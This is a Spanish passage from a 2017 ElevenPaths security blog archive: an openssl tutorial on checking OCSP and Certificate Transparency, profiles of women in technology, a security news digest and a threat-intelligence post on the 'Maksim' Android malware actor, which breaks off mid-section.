yaiza.rubiovinuela@telefonica.com
21 de noviembre de 2017
Funcionamiento de OCSP con Certificate Transparency
Online Certificate Status Protocol (OCSP) quizás sea el protocolo menos conocido o estudiado de la infraestructura PKI, los certificados digitales y la familia SSL/TLS, ya de por sí desconocidos en su zona más "técnica" y "profunda". En este artículo, profundizaremos cómo se comporta no solo este protocolo, sino cómo interactúa con Certificate Transparency, ahora que será obligatorio en abril. Esencialmente existen tres tecnologías que los navegadores pueden implementar para comprobar el estado de revocación de un certificado digital: La lista negra de revocación descargable, conocida como Certificate Revocation List (CRL) definido en la RFC 5280. Las CRL es una lista de números de serie de certificados revocados que se descarga en un intervalo fijo de tiempo. La historia ha demostrado que no funciona. OCSP, definido en la RFC 6960. OSCP funciona con un mecanismo de pedido-respuesta que solicita la información sobre un certificado específico a la CA. CRLSets. Es un método "rápido" de revocación que utiliza solo Chrome, como ellos mismo dicen, para "situaciones de emergencia". Son un conjunto de certificados que se aglutinan de información de otros CRLs, se descargan de un servidor, y son procesados por Chrome. Aunque el método es absolutamente transparente, la gestión de qué certificados van en la lista es totalmente opaca, no se sabe con qué certificados lo actualizan (a menos que se averigüe por otro lado). La diferencia fundamental es que CRL proporciona la lista de certificados revocados con menor frecuencia, y por tanto, no proporciona la agilidad que se espera ante una revocación exprés. OCSP brinda información en tiempo real sobre los certificados revocados por una CA emisora. Por ejemplo, para realizar una validación manual de la CRL se puede seguir los siguientes pasos, tomando como ejemplo un Banco de Malasya (maybank.com.id)
// Descargar Certificado de Banco de Malasya
openssl s_client -connect maybank.co.id:443 2>&1 < /dev/null
| sed -n '/-----BEGIN/,/-----END/p' > maybank.pem
// Obtener URL de la CRL
openssl x509 -noout -text -in maybank.pem | grep -A 4 'X509v3 CRL Distribution Points'
// Obtiene el serial del certificado
openssl x509 -noout -text -in maybank.pem | grep -A 4 'Serial Number'
>> 52:AF:68:16:46:76:59:8D:57:57:2B:E5:F8:D2:8F:0F
// Descargar archive de la CRL actual, formato binario
wget http://ss.symcb.com/ss.crl
// CRL en formato texto
openssl crl -inform DER -text -noout -in ss.crl > ss.pem
A través de esta verificación se puede comprobar un certificado antiguo (Serial Number: 14394B794CEBA750CE1648189AF06049) revocado en 2012:
// CRL de verisign utilizado por el banco en 2012
wget http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl
openssl crl -inform DER -text -noout -in SVRIntlG3.crl >SVRIntlG3.pem
// Verifica la revocación de dos certificados
grep "14394B794C" SVRIntlG3.pem (revocado Sep 12 02:49:50 2012 GMT)
grep "52AF681646" SVRIntlG3.pem (actual, no revocado)
Sin embargo, uno de los problemas que surge cuando la comprobación OCSP está habilitada es el tiempo necesario para completar el Handshake SSL/TLS; a mayor número de peticiones y verificaciones, mayor es el tiempo que le lleva al navegador comprobar la validez del certificado y en mostrar el sitio… algo inaceptable para los tiempos que debe manejar un sitio importante hoy por hoy. Por ejemplo, para que el navegador muestre la "barra verde" que distingue un certificado de Validación Extendida (EV), las solicitudes OCSP deben hacerse para todos los certificados de la cadena (en algunos casos esto puede requerir hasta tres solicitudes OCSP), y dependerá del navegador la forma de realizar dicha comprobación que puede ser secuencial, en paralelo o a través de una red de distribución de contenido o CDN. Como nota importante, el equipo de Cloudflare dice que con estas comprobaciones, puede llegar a haber hasta un 30 % adicional de tiempo en la carga de un sitio web. Para superar los problemas de rendimiento, el grupo de trabajo TLS de Internet Engineering Task Force definió una extensión del protocolo TLS, denominado Stapled OCSP (en una mala traducción al español: OCSP grapado). Es una práctica recomendada por el consorcio CA/Browser Forums y puede ser implementado fácilmente en IIS 7+, Apache 2.4+, Nginx 1.7.3+ y Exim, siendo reconocido también por los principales navegadores del mercado. La clave para un mejor rendimiento es deshacerse de las solicitudes adicionales hacia la CA, y la respuesta OCSP debe ser incluida directamente en el saludo inicial del protocolo SSL/TLS. De este modo, el Stapled utiliza el servidor TLS como proxy para que solicite la respuesta OCSP y la envíe al cliente como parte del handshake TLS. Como la respuesta se obtiene directamente desde el servidor, el cliente no necesita solicitar información a la CA emisora, lo que resulta en un mayor rendimiento del sitio. Sin embargo, la práctica demuestra falta de implementación de servidores con Stapling OCSP habilitado. Este comportamiento puede deberse principalmente a tres factores: Falta de conocimiento del protocolo, mencionado al comienzo. Falsa creencia actual de que los tiempos de sobrecarga no son importantes. Baja tasa de certificados revocados (0,3 % según este estudio) que se ven en la actualidad, lo cual invalida la necesidad de verificarlos. Por lo antes expuesto, cuando se trata de validar implementaciones de seguridad sobre la base del uso de OCSP, el análisis resulta incómodo y hasta a veces puede parecer innecesario o inútil. Esto también nos sucedió en ElevenPaths cuando nos encontrábamos desarrollando el plugin de Firefox y SCT Checker para detectar Transparencia de Certificados sobre OCSP. Recordemos que, como ya mencionamos, existen tres formas de ubicar físicamente el registro SCT que acompaña al certificado: como extensión X.509v3, como extensión del protocolo TLS (extensión 18) y en respuesta de OCSP. En este último caso, la baja tasa de implementación atentaba contra nuestras pruebas llegando a resultar (casi) imposible encontrar CT sobre OSCP. Ejemplo de obtención del registro OCSP sobre el dominio de Google (sin resultados) y el de la entidad certifidora Digicert: openssl s_client -connect google.com:443 -status | grep -A 4 "OCSP response:" (no muestra OCSP response)
openssl s_client -connect digicert.com:443 -status | grep -A 4 -B 4 "OCSP Response Data:" (muestra OCSP response)
De acuerdo a lo anterior, para realizar pruebas de obtención del registro SCT sobre OCSP, se buscó un sitio web que lo tuviera implementado y a partir de allí se realizó el siguiente análisis: // Obtener el certificado de "sslanalyzer.comodoca.com", con SCT sobre OCSP
openssl s_client -connect sslanalyzer.comodoca.com:443 2>&1 < /dev/null
| sed -n '/-----BEGIN/,/-----END/p' | cat > comodo.pem
// Obtener la cadena de certificados.
//El primero se descarta porque es el ya descargado antes
openssl s_client -connect sslanalyzer.comodoca.com:443 2>&1 -showcerts <
/dev/null | sed -n '/-----BEGIN/,/-----END/p' |
perl -0777 -pe 's/.*?-{5}ENDsCERTIFICATE-{5}n//s' | cat > chain_comodo.pem
// Obtener la dirección OCSP del certificado
openssl x509 -noout -ocsp_uri -in comodo.pem
>> "http://ocsp.comodoca.com",
// Ejecutar la validación OCSP
openssl ocsp -issuer chain_comodo.pem -cert comodo.pem -url
http://ocsp.comodoca.com -header "HOST=ocsp.comodoca.com"
-VAfile chain_comodo.pem
openssl ocsp -issuer chain_comodo.pem -cert comodo.pem -text
-url http://ocsp.comodoca.com -header "HOST=ocsp.comodoca.com"
-VAfile chain_comodo.pem
Efectivamente, con estas consultas se obtienen los registros SCT y Log ID del dominio analizado: A modo de control, se puede tomar el primer Log ID en hexadecimal, convertirlo a BASE64 y verificarlo contra el listado público de Logs de Transparencia de Certificados. echo "56:14:06:9A:2F:D7:C2:EC:D3:F5:E1:BD:44:B2:3E:C7:46:76:B9:BC:99: 11:5C:C0:EF:94:98:55:D6:89:D0:DD" | tr -d : | xxd -r -p | base64
>> VhQGmi/XwuzT9eG9RLI+x0Z2ubyZEVzA75SYVdaJ0N0= De acuerdo al listado de Certificate Transparency, este ID corresponde a: ct1.digicert-ct.com/log Esta información también puede visualizarse fácilmente desde Chrome, al acceder al sitio web ( sslanalyzer.comodoca.com) y, mediante la visualización de los eventos de conexión en el momento del Handshake TLS: chrome://net-internals/#events scts_from_ocsp_response = "AO8AdQBWFAaaL9fC7NP14b1Esj7HRna5vJkRXM DvlJhV1onQ3QAAAVF7xvsQAAAEAwBGMEQCIGOBoDxxtb/VoujmQ3WH2u4T1jF3Ri KNlSEK+MLg9dA0AiATrA9czgxAZsPtoiGuSBHnfSv014jJJSgvtvq3ambrEgB2AGj 2mPgfZIK+OozuuSgdTPxxUV1nk9RE0QpnrLtPT/vEAAABUXvG/WAAAAQDAEcwRQIhA Oum7vph1pHy8AIxobtkDD5ZE6SkroxzSdC6bmZoX9WDAiBTmudcU6U+4lvVXqgxmHFw 74kjvEHfCq4oK40jgvw+dw==" Log ID = "VhQGmi/XwuzT9eG9RLI+x0Z2ubyZEVzA75SYVdaJ0N0=" Ahora, transformando la primera cadena a hexadecimal, podemos conocer los detalles de cada uno de los registros SCT: echo "AO8AdQBWFAaaL9fC7NP14b1Esj7HRna5vJkRXMDvlJhV1onQ3QAAAVF7xvsQA AAEAwBGMEQCIGOBoDxxtb/VoujmQ3WH2u4T1jF3RiKNlSEK+MLg9dA0AiATrA9czgx AZsPtoiGuSBHnfSv014jJJSgvtvq3ambrEgB2AGj2mPgfZIK+OozuuSgdTPxxUV1nk9 RE0QpnrLtPT/vEAAABUXvG/WAAAAQDAEcwRQIhAOum7vph1pHy8AIxobtkDD5ZE6Skro xzSdC6bmZoX9WDAiBTmudcU6U+4lvVXqgxmHFw74kjvEHfCq4oK40jgvw+dw==" | base64 -d | xxd -p | tr -d 'n'
>> 00ef0075005614069a2fd7c2ecd3f5e1bd44b23ec74676b9bc99115cc0ef949855d 689d0dd000001517bc6fb10000004030046304402206381a03c71b5bfd5a2e8e6437 587daee13d6317746228d95210af8c2e0f5d034022013ac0f5cce0c4066c3eda221a e4811e77d2bf4d788c925282fb6fab76a66eb1200760068f698f81f6482be3a8ceeb 9281d4cfc71515d6793d444d10a67acbb4f4ffbc4000001517bc6fd60000004030047 3045022100eba6eefa61d691f2f00231a1bb640c3e5913a4a4ae8c7349d0ba6e66685 fd5830220539ae75c53a53ee25bd55ea831987170ef8923bc41df0aae282b8d2382fc3e77 Analizando y separando apropiadamente esta cadena, se puede obtener los detalles de cada uno de los registros SCT: Como puede comprobarse a través del análisis de la cadena OSCP, se puede ver cada uno de los registros SCT implementados. Desde hace no mucho, también se puede realizar mediante el nuevo modificador "-ct" en OpenSSL: openssl s_client -ct -connect sslanalyzer.comodoca.com:443 Para esto se debe crear el archivo " /usr/lib/ssl/nano ct_log_list.cnf" con la lista de servidores de transparencia que puedes ver aquí. Destacamos que la verificación manual de OCSP no es sencilla y no ayuda a intentar convencer a los administradores a su adopción. Sin embargo, y desde el punto de vista de seguridad OCSP resulta útil si un atacante intenta realizar un ataque MitM contra los certificados digitales y permite detectarlo a tiempo. Por eso, en nuestras soluciones antifraude, creemos necesarios la inclusión de mecanismos de revocación como CRL y OCSP/OCSP Stapling y transparencia de certificados que faciliten la detección de certificados revocados y permita la rápida detección de sitios fraudulentos. También te puede interesar: » Certificate Transparency » Nueva herramienta: PySCTChecker » Una aproximación práctica al Certificate Transparency » Certificate Transparency Known Logs » Baseline Requirements for the Issuance and Management of Publicly-Trusted Certificates, v.1.0 » N ginx: Enabling OCSP Stapling on Your Server » W indows: Enabling OCSP Stapling on Your Server » Why OCSP Stapling is the Best Method for Checking Certificate Validity Cristian Borghello Equipo de Innovación y Laboratorio de ElevenPaths cristian.borghello@11paths.com @crisborghe
20 de noviembre de 2017
Historias de #MujeresHacker: Sheila Berta, la speaker más joven en DefCON & BlackHat
Según los estudios, sólo el 25% de la fuerza laboral mundial del sector de la tecnología está representado por mujeres, algo que debemos lograr incrementar entre todos. En Telefónica nos encantaría que ese 25% fuera un 50%. Por eso, decidimos hackear la diversidad. Creemos que para crear tecnología solo hay que tener pasión por hacerlo, y no debe existir ninguna correlación entre género y ocupación. Hoy lanzamos la segunda acción de una campaña que busca lograr que haya más #MujeresHacker como vosotras, y si es posible, vengan a crear tecnología con nosotros. En este primer post contamos con Sheila Berta, la speaker más joven en participar en DefCon y BlackHat que a su corta edad se ha adentrado con éxito en el mundo hacking. Sheila Berta, una de las #MujeresHacker de Telefónica nos cuenta su historia: Mi nombre es Sheila y tengo 22 años, si me preguntas desde qué edad me dedico a esto tengo que responder que a los 12 años descubrí que verdaderamente me apasionaba el área de seguridad informática y hacking. A esa edad empecé a programar en diferentes lenguajes y pensé: "¿Existe alguna forma de romper estas aplicaciones que estoy creando?". Mi curiosidad hizo que me pusiera a leer sobre estas técnicas de SQL injection, XSS, XSRF, LFI/RFI, etcétera y comencé a divertirme mucho con ello. En mi día a día, sigo manteniendo la misma pasión y esa curiosidad me lleva de un lado a otro constantemente. No puedo describir lo que disfruto al poner al revés las cosas, al encontrar dónde fallan y cómo alguien podría realizar un ataque con ello. Actualmente, trabajo como Security Researcher en el Laboratorio de Investigación e Innovación de ElevenPaths. Hasta el momento he dado 21 conferencias y tengo confirmadas unas 2 más para antes de fin de año. Durante todo este tiempo hay muchísimas cosas que me han generado sensación de satisfacción en mi trabajo. Lo que aprendí, la gente con la que tuve oportunidad de trabajar, los pequeños proyectos propios que salieron a la luz, los eventos en los que participé… algunos esfuerzos que, sintiéndome inevitablemente un poco sola como mujer en esta área, no fueron fáciles, pero todo valió absolutamente la pena. Puedo afirmar que de uno de los trabajos de los que me siento más orgullosa es el que presentamos Claudio Caracciolo y yo en DefCON25 CHV: "The Bicho". Es un hardware en el que puse mucho esfuerzo diseñándolo desde cero, programando el firmware en assembler, desarrollando un software de escritorio para interactuar con él cómodamente. Lo que más orgullo me da es verlo funcionar, programar el payload desde el pc, conectar el hardware al coche y controlar el comportamiento de diversos módulos simplemente mandando un SMS, me parece una locura. Otra de las cosas que más disfruto es de dar charlas. Mi primera experiencia como speaker fue en el OWASP LATAM TOUR de Buenos Aires en 2015. Ese mismo año fui a dar mi primera charla internacional al DragonJarCon en Manizales - Colombia. A partir de ahí me animé a presentar en cualquier evento donde tuviera ganas de hablar, así es como logré estar presente en DefCON 25 CHV, el Arsenal de Black Hat Europe (2016) y USA (2017), tres veces consecutivas en la Ekoparty Security Conference, dos veces en DragonJarCon y varias veces en distintos eventos de OWASP. Ahora el foco lo tengo puesto en el briefing para Black Hat Europe, que tendrá lugar en diciembre. Dicen por ahí que he sido la chica más joven en dar una charla en DefCON y en BlackHat, quizás también la única chica (o una de las pocas) de Latinoamerica en hacerlo. Todo esto espero que no solo me ayude a mi sino también que anime a otras chicas a tener la valentía de querer estar en DefCON hablando delante de expertos, porque es una experiencia genial. Pensando en las niñas a las que les gusta la tecnología o el hacking y tienen dudas, ellas son el motivo por el que innumerables veces he intentado seguir adelante. Durante estos 10 años me he enfrentado a muchas situaciones que no hubiera tenido que atravesar si fuera del sexo opuesto. Primero, tuve muchas dudas y no me atrevía a ir a ciertos eventos porque sabía que probablemente sería la única chica allí. Más tarde, cuando empecé a participar en diferentes conferencias, era el “bicho raro” y llamaba la atención por ser la única chica en una mesa de speakers junto a 30 hombres. Por ello soporté comentarios negativos y un montón de situaciones hostiles. Cuando tuve momentos en los que no quería seguir pensaba: "Si cada chica que atraviesa estas situaciones abandona, siempre habrá una próxima que tendrá que abrirse el mismo camino y será el nuevo bicho raro de la comunidad, pasando por las mismas consecuencias". No quiero que ninguna niña que el día de mañana se dedique a la ciberseguridad pase por las cosas que yo pasé, y por eso sigo adelante. Pienso que la mejor forma de minimizar esas posibilidades es que cada vez seamos más chicas en infosec y así cada vez seamos menos “bichos raros” y no tengamos que sufrir consecuencias por ello. Así que si eres una chica y te estas iniciando en infosec, ¡Sigue adelante! Sheila Berta Security Researcher @ElevenPaths @UnaPibaGeek Si tú también eres mujer y hacker cuéntanos tu historia en mujereshacker@telefonica.com o rellena el siguiente formulario para inspirar a las más jóvenes. A partir de hoy, iremos publicando las historias recibidas más inspiradoras, valientes y alentadoras. Estáte atento, todos los viernes publicaremos un nuevo post de la serie #MujeresHackers: » Mamá, yo quiero ser hacker
17 de noviembre de 2017
Susan Kare: pionera en diseño gráfico y creadora de iconos emblemáticos de Apple y Windows
Ilustración realizada por Catalina Guzmán “Es más fácil entender imágenes que palabras”. Susan Kare Susan Kare es creadora de algunos de los iconos más reconocidos de Apple, y a pesar de haberlos creado hace muchos años, los seguimos utilizando en nuestro día a día. Ella ha diseñado desde el botón de comando de Apple, el look and feel del juego Solitario y Bloc de Notas de Windows, hasta los regalos virtuales de Facebook. Biografía Pionera en el diseño gráfico y el arte en píxeles, Susan Karen nació el 5 de febrero de 1954 en Ithaca, Nueva York. Estudió arte en Mount Holyoke College, donde en 1975 se graduó como Summa Cum Laude, y posteriormente desarrolló su Máster y Doctorado en New York University. A principios de los años 80 Susan recibió una llamada de su amigo Andy Hertzfeld para que se incorporara a Apple como parte del equipo de diseño. Apple necesitaba crear un ordenador que fuera fácil de usar y asequible para el consumidor. Por esto, en 1984 lanzaron Macintosh con la filosofía de poner al cliente en el centro y pensar en él en todas las etapas de diseño. Para lograrlo, Susan creó en una cuadrícula de píxeles muchos de los iconos y tipografías de forma sencilla para que al usuario le fuera fácil usar su dispositivo. Con esta técnica ella consiguió revolucionar el arte de la tipografía e iconografía. Kare saltó de Apple a Microsoft, donde diseñó el juego Solitario, el Bloc de Notas y el Panel de Control. Susan cuenta que al ver a la gente jugando en la oficina le causa una gran felicidad ya que ve sus diseños en uso. Más tarde, la contrataron para una colaboración entre Sony, AT&T y Motorola donde creó sellos que se enviaban en postales digitales. De aquí pasó al reto de trabajar para Facebook donde diseñó alrededor de 1.200 regalos virtuales. Su trabajo ha sido usado por las empresas más grandes del mundo y contribuyó al uso cotidiano del ordenador. Es por esta razón que es imposible usar un ordenador y no encontrarte con el trabajo de Susan. Entre sus iconos más reconocidos están: la cubeta de pintura, el lasso tool, el cursor, el botón de comando, la bomba, la papelera y el reloj. Entre sus tipografías más conocidas están : Chicago, Monaco, Geneva, Athens, San Francisco y Cairo. Chicago fue la tipografía usada en Mac clásica y las primeras cuatro generaciones del iPod. "Los diseños tienen que ser memorables, simples y claros" . Esta era la base de la filosofía de Susan al diseñar. Para ella, un buen diseño debía cumplir con esto para resistir el paso del tiempo y evitar ser rediseñado constantemente. Solo se deben incluir los detalles que sean realmente necesarios ya que, si se sobrecarga el diseño, el usuario pierde esa conexión con él. Actualmente puedes encontrar los diseños originales de Susan en el Museo de arte moderno ( MoMa ) en Nueva York. ¿Qué opinas sobre la brecha de género que hay en el sector tecnológico? ¡Déjanos tu comentario! Lee el resto de posts de la serie homenaje de mujeres que han creado un hito en la historia STEM: » Sheryl Sandberg: COO de Facebook y creadora del movimiento "Lean In" » Dorothy Vaughan: matemática y primera manager afroamericana de la NASA » Jude Milhon: defensora pionera de los ciberderechos » Grace Murray Hopper: Inventora del Cobol y del término "bug" » Carol Shaw: la primera mujer diseñadora y programadora de videojuegos
15 de noviembre de 2017
#CyberSecurityPulse: El último desastre de las carteras más importantes de Ethereum
Se estima que 587 carteras con alrededor de 513 774,16 ethers han sido congelados después de que una anomalía en una de las carteras más importantes de Ethereum fuera detectada. Parity Technologies, empresa dedicada al desarrollo de software especializada en soluciones peer-to-peer, publicó el pasado 8 de noviembre la alerta de seguridad donde afirmaba que habían detectado una vunerabilidad en la librería de las cartera multifirma. Específicamente, la empresa considera que los afectados son aquellos usuarios con activos en carteras creadas en Parity Wallet después de 20 de julio. Resulta que tras parchear la vulnerabilidad del pasado 19 de julio, el 20 de julio se implementó una nueva versión de la librería del contrato de Parity Wallet. Desafortunadamente, ese código contenía otra vulnerabilidad que no había sido descubierta en ese momento. En esta ocasión, era posible convertir la librería del contrato de Parity Wallet en una cartera multifirma normal y convertirse en propietario al llamar a la función initWallet. La compañía, en su último comunicado publicado ayer, comentaba que esta es una oportunidad de aprendizaje (aunque dolorosa) para la empresa, sus colaboradores y la comunidad. Afirma que ha habido discusiones dentro de Parity y en la comunidad open source desde hace un tiempo sobre cómo construir sistemas mejores y más seguros. Después de todos los incidentes de seguridad que han sufrido los usuarios de criptodivisas en estos últimos años, solo hay una cosa clara: sin seguridad, no habrá transformación en los medios de pago. Más información en Parity Tech Noticias destacadas Vulnerabilidad crítica que filtra la dirección IP real de los usuarios Las versiones para Mac y Linux del navegador de Tor acaban de recibir una solución temporal para la vulnerabilidad que filtra las direcciones IP de los usuarios cuando visitan ciertos tipos de direcciones. TorMoil, el nombre del fallo asignado por su descubridor, se activa cuando los usuarios hacen clic en enlaces que comienzan con file: //. Cuando el navegador Tor para macOS y Linux está en proceso de abrir dicha dirección, "el sistema operativo puede conectarse directamente al host remoto, sin pasar por el navegador Tor", según We Are Segment, la seguridad empresa que informó en privado el error a los desarrolladores de Tor. Más información en We Are Segment APT28 ha usado la técnica de ataque DDE desde octubre Los ciberdelincuentes han comenzado a explotar activamente una vulnerabilidad de Microsoft Office recientemente descubierta. Según investigadores de McAfee, esta técnica de ataque DDE ha sido aprovechada por APT28 desde finales de octubre. La campaña incluyó documentos que hacen referencia al reciente ataque terrorista en la ciudad de Nueva York en un intento de engañar a las víctimas para que hagan clic en los documentos maliciosos, lo que finalmente infecta sus sistemas con malware. Más información en McAfee Noticias del resto de la semana Propuesta de ley en Estados Unidos para designar al sistema electoral como infraestructura crítica Un proyecto de ley del Senado pondría el poder de la legislación detrás de gran parte del trabajo de seguridad electoral del gobierno de Estados Unidos durante el año pasado y establecería una competencia nacional para proteger los sistemas electorales. La Ley de seguridad del equipo de votación de Estados Unidos, o Ley SAVE, formalizaría la designación de sistemas electorales del Departamento de Seguridad Nacional como infraestructura crítica, una medida que facilita que el gobierno federal comparta información sobre amenazas con funcionarios electorales estatales. Más información en NextGov Las implementaciones del IEEE P1735 pueden tener protecciones criptográficas débiles El estándar P1735 del IEEE describe métodos para cifrar la propiedad intelectual (IP) del diseño electrónico, así como la gestión de los derechos de acceso para dicha IP. Los métodos son defectuosos y, en los peores casos, favorecerían vectores de ataque que permiten la recuperación de todo el texto en claro subyacente. Las implementaciones de IEEE P1735 pueden ser débiles frente a ataques criptográficos que permiterían a un atacante obtener la propiedad intelectual sin la clave, entre otros. Más información en Cert.gov Vault 8: WikiLeaks publica el código de Hive Wikileaks anunció ayer una nueva serie de Vault 8 que revelará el código fuente y la información sobre la infraestructura de backend desarrollada por la CIA. La infraestructura del proyecto Hive se ha diseñado especialmente para evitar la atribución, que incluye un sitio web falso público después de realizar una comunicación en varias etapas a través de una red privada virtual (VPN). Más información en Wikileaks Otras noticias Descubren que los teclados MantisTek GK2 incluyen keyloggers Más información en The Hacker News El nuevo grupo SowBug ha estado robando secretos diplomáticos desde 2015 Más información en Symantec El ataque AVGater abusa de las funciones de cuarentena para escalar privilegios Más información en Security Affairs ¡Regístrate a la newsletter!
13 de noviembre de 2017
Innovación y Laboratorio de ElevenPaths en Black Hat Europe
La conferencia Black Hat Europe 2017, una de las más importantes del mundo en seguridad informática, celebra su edición de Europa 2017 en Londres. Tras la original edición de Las Vegas de agosto donde participaron también varios compañeros de ElevenPaths, del 4 al 7 de diciembre, cinco más partirán en Londres para presentar sus investigaciones y herramientas. Black Hat se ha convertido en un foro donde se muestran las investigaciones más importantes en seguridad de la información a profesionales y curiosos de todo el mundo. Cuatro días en los que se presentan las investigaciones y herramientas más relevantes, además de realizar entrenamientos y talleres exclusivos. Se espera un aforo de más de 1600 asistentes. Del 4 al 5 de diciembre, durante la presentación del " Arsenal", la sección dedicada especialmente a las herramientas, Álvaro Núñez presentará DirtyPi, o lo que es lo mismo, Dirtytooth for Raspberry Pi. Pablo González y Santiago Hernández presentarán además UAC-A-MOLA, diseñada para facilitar la explotación de los últimos (y numerosos) fallos y técnicas encontradas para eludir UAC. Sergio de los Santos y Sheila Berta, también del área de innovación y laboratorio, presentarán además en la sección de "Briefings" el día 7, la investigación " Breaking out HSTS and HPKP on Firefox, IE/Edge and (possibly) Chrome", en el que muestran algunas debilidades y técnicas para eludir estos mecanismos en los principales navegadores. Equipo de Innovación y Laboratorio
13 de noviembre de 2017
Sheryl Sandberg: COO de Facebook y creadora del movimiento "Lean In"
Ilustración realizada por Catalina Guzmán "Un mundo verdaderamente igual sería aquel en el que las mujeres administraran la mitad de nuestros países y las empresas y los hombres administraran la mitad de nuestros hogares" . Sheryl Sandberg Sheryl Sandberg es reconocida mundialmente por tener, a tan corta edad, uno de los CV más destacados del mundo. Actualmente es la COO de Facebook y la única mujer en su junta directiva. También ha creado el movimiento “ Lean In” el cual tiene como fin inspirar a las mujeres a buscar papeles de liderazgo y romper con las barreras de género. Biografía Sheryl nació el 28 de agosto de 1969 en Washington DC. Estudió economía e hizo un MBA en Harvard. Al graduarse en 1987 fue asistente en el Banco Mundial donde trabajó un año en proyectos de la India ayudando a leprosos, gente con SIDA y ciega, actividad que luego le motivaría durante su tiempo en Google, donde ejerció como VP de ventas y operaciones online a nivel mundial. Además fue la responsable de la venta de anuncios en Google y gestionó Google Book Search. También creó Google.org, la rama solidaria de Google que se encarga de ayudar a organizaciones sin ánimos de lucro. En 2008 se fue a Facebook como la Chief Operations Officer (COO) y actualmente gestiona las Ventas, Marketing, Recursos Humanos, Políticas Públicas y Comunicaciones. En 2012 Mark Zuckerberg nombró a Sheryl como el octavo miembro de su junta de directores. Dada la cantidad de acciones que posee de Facebook y la valoración de la empresa en la bolsa de valores, en 2014 Sheryl entró a formar parte de la lista de billonarios del mundo. Con esta carrera, podríamos decir que Sheryl Sandberg es la ejecutiva que lo ha logrado todo. "Lean In" Para Sheryl, su legado es algo muy importante, ya que comprende que las mujeres están en este punto de la historia por sus predecesoras. La contribución que ella le quiere dejar a la sociedad se ve a través de su movimiento “Lean In”. Este movimiento trata sobre el desarrollo y el liderazgo empresarial de las mujeres, los problemas que salen por la falta de éstas en altas posiciones y sobre el trato equitativo de la mujer en sociedad con respecto al hombre. ¿Por qué es tan difícil encontrar mujeres en el mundo de la tecnología? Según Sandberg, existen tanto barreras internas como externas que evitan que la mujer logre altos puestos empresariales y solo rompiéndolas lograrán lo que se han propuesto. Las barreras externas a las que se enfrentan son acoso, discriminación y prejuicios por género. Esto queda en evidencia al ver que hay empresas que no quieren contratar mujeres entre los 20 y 30 años por no tener que pagarles la baja por maternidad. Por otro lado, las barreras internas son determinadas por la motivación personal de cada mujer. Esta motivación es afectada por la infancia, compañeros, educación, contactos, expectativas y los prejuicios. De todas estas barreras la educación es el pilar fundamental para que la mujer crezca, triunfe y logré producir un cambio. “Lean In” trata de mostrar a las mujeres cómo sí es posible que logren sus sueños, que vayan a por lo que siempre han querido, incluso aunque por la sociedad en la que viven, algunas no tienen la posibilidad de hacerlo. Sin embargo, en un ambiente de confianza se dan cuentan que si se apoyan unas a otras pueden lograr lo que se propongan. Muchas mujeres trabajan duro, pero siguen siendo pasadas por alto en comparación a sus compañeros. Muchas veces esto pasa por falta de referentes. Por eso "Lean In" se une con Getty Images para cambiar la forma en la que la sociedad ve a la mujer. Juntos quieren cambiar las imágenes que publican para darle una vuelta a los estereotipos, mostrando a más mujeres en la oficina y más hombres haciendo tareas de casa. En este proyecto también se muestran mujeres diferentes, con imperfecciones para romper la barrera que la mujer tiene que ser la madre y trabajadora perfecta. En 2012, Time Magazine nombra a Sheryl Sandberg como una de las 100 personas más influyentes del mundo y según Forbes, como una de las mujeres más poderosa del mundo. Por mujeres como Sheryl queremos rendir homenaje a algunas mujeres que han aportado alguna creación o han marcado un hito en el mundo de la tecnología. Todos lo miércoles hasta el 20 de diciembre iremos publicando un post dedicado a estas mujeres. ¿Qué opinas sobre la diversidad? ¡Déjanos tu comentario! Lee el resto de posts de la serie homenaje de mujeres que han creado un hito en la historia STEM: » Susan Kare: una pionera e influencia en la iconografía digital » Dorothy Vaughan: matemática y primera manager afroamericana de la NASA » Jude Milhon: defensora pionera de los ciberderechos » Grace Murray Hopper: Inventora del Cobol y del término "bug" » Carol Shaw: la primera mujer diseñadora y programadora de videojuegos
8 de noviembre de 2017
#CyberSecurItyAvatar: Maksim, uno de los atacantes más prolíficos para Android, aumenta su actividad maliciosa
Según las bases de datos de amenazas de las que dispone ElevenPaths, a partir de mayo de 2016, comenzó a detectarse una amenaza que afectaba a dispositivos Android de la que, según la figura siguiente, se pudo identificar un repunte de conexiones activas el pasado mes de marzo. Figura SEQ Figura * ARABIC 1 . Número de sesiones activas vinculadas al arsenal de Maksim. El actor llamado Maksim descargaba aplicaciones legítimas y populares, las desempaquetaba, introducía el código malicioso para luego distribuirlas troyanizadas a través de webs de aplicaciones, la gran mayoría de juegos. Gran parte de las infecciones se realizaron a través de la navegación web, además de haberse detectado que las industrias más afectadas por esta amenaza han sido la industria al por mayor y la destinada a la alta tecnología. Asimismo, la amenaza procedería de países como Rusia, Alemania y Holanda con un mayor impacto en Estados Unidos y Armenia. Herramientas Se le ha podido atribuir numerosas aplicaciones maliciosas a través de la correlación de las apk disponibles en las webs manejadas por el atacante. Además, son muchas y variadas las funcionalidades detectadas en las aplicaciones que utiliza en su arsenal, entre las que se encuentran las siguientes: Inyecta troyanos en aplicaciones legítimas cuyo objetivo era entregar publicidad a las víctimas, enviar SMS e incluso obtener el control administrativo y remoto del dispositivo. Otro de los troyanos utilizados incorporaba sistemas legítimos para protegerse del análisis y la detección del mismo. Adicionalmente, mostraba un alto nivel de sofisticación al ser capaces de omitir el sistema de aviso de carga, utilizado para notificar a los usuarios el precio de un servicio Premium, y requerir la autorización del usuario. Incorpora librerías de Adware en aplicaciones legítimas para obtener información de los dispositivos como las aplicaciones instaladas o ejecutándose, el operador y la geolocalización entre otra información para ser enviada al servidor command and control (C&C). Algunas de estas librerías usan el método ClassLoader clásico que permite cargar y ejecutar código dinámicamente. Usa familias de malware con capacidad de enviar información del dispositivo a un servidor de command and control. En este sentido, enviaba SMS a instituciones financieras para consultar saldos de cuenta, cargaba cualquier SMS entrante (incluidos los resultados de la consulta de saldo) en el servidor C2, envía SMS a números de teléfono de los contactos de la víctima y reenvía las llamadas entrantes para interceptar la autenticación en dos pasos basadas en voz. Utiliza troyanos SMS con amplias funcionalidades como pueden ser el envío de mensajes de texto Premium a un número específico o el envío de mensajes de texto generalmente con un enlace a una web manejada por sí mismo o a una amenaza diferente. Usualmente obtiene la lista de contactos y los mensajes de texto del dispositivo de la víctima o incluso borra los mensajes de texto entrantes que cumplan con los criterios establecidos por el C&C. Utiliza ransomware específicamente diseñado para Android, el cual bloquea la pantalla y no sólo cifra los archivos existentes, sino que también infecta los ejecutables, actuando así como un virus parásito. Figura 1 . Número de sesiones activas vinculadas al arsenal de Maksim. Técnicas Maksim utiliza 